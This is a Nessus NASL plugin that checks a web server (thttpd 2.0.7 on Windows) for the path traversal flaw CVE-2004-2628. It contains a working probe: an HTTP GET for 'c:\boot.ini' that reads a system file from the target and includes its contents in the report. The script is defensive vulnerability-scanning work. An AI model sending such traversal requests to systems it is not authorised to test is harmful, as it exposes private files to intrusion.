#  This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
#  based on work from
#  (C) Tenable Network Security
#
# This script is released under the GNU GPLv2

 desc["english"] = "
Synopsis :

The remote web server is vulnerable to a path traversal vulnerability. 

Description :

The remote web server fails to limit requests to items within the
document directory.  An attacker may exploit this flaw to read
arbitrary files on the remote system with the privileges of the http
process. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0097.html

Solution : 

Unknown at this time.

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if(description)
{
 script_id(14229);
 script_cve_id("CVE-2004-2628");
 script_bugtraq_id(10862);
 if (defined_func("script_xref")) {
   script_xref(name:"OSVDB", value:"8372");
 }
 script_version ("$Revision: 1.9 $");
 
 name["english"] = "HTTP Directory Traversal (Windows)";
 script_name(english:name["english"]);
 
 script_description(english:desc["english"]);
 
 summary["english"] = "thttpd flaw in 2.0.7 windows port";
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2004 David Maciejak");
 family["english"] = "Remote file access";
 script_family(english:family["english"]);
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_http_port(default:80);

if(get_port_state(port))
{
 soc = http_open_socket(port);
 if(soc)
 {
  buf = http_get(item:"c:\boot.ini", port:port);
  send(socket:soc, data:buf);
  rep = http_recv(socket:soc);
  if ( '\r\n\r\n' >< rep )
   rep = strstr(rep, '\r\n\r\n');

  if(egrep(pattern:"\[boot loader\]", string:rep))
  {
    report = string(
      desc["english"],
      "\n\n",
      "Plugin output :\n",
      "\n",
      "Requesting the file c:\boot.ini returns :\n",
      "\n",
      rep
    );
    security_warning(port:port, data:report);
  }

  http_close_socket(soc);
 }
}
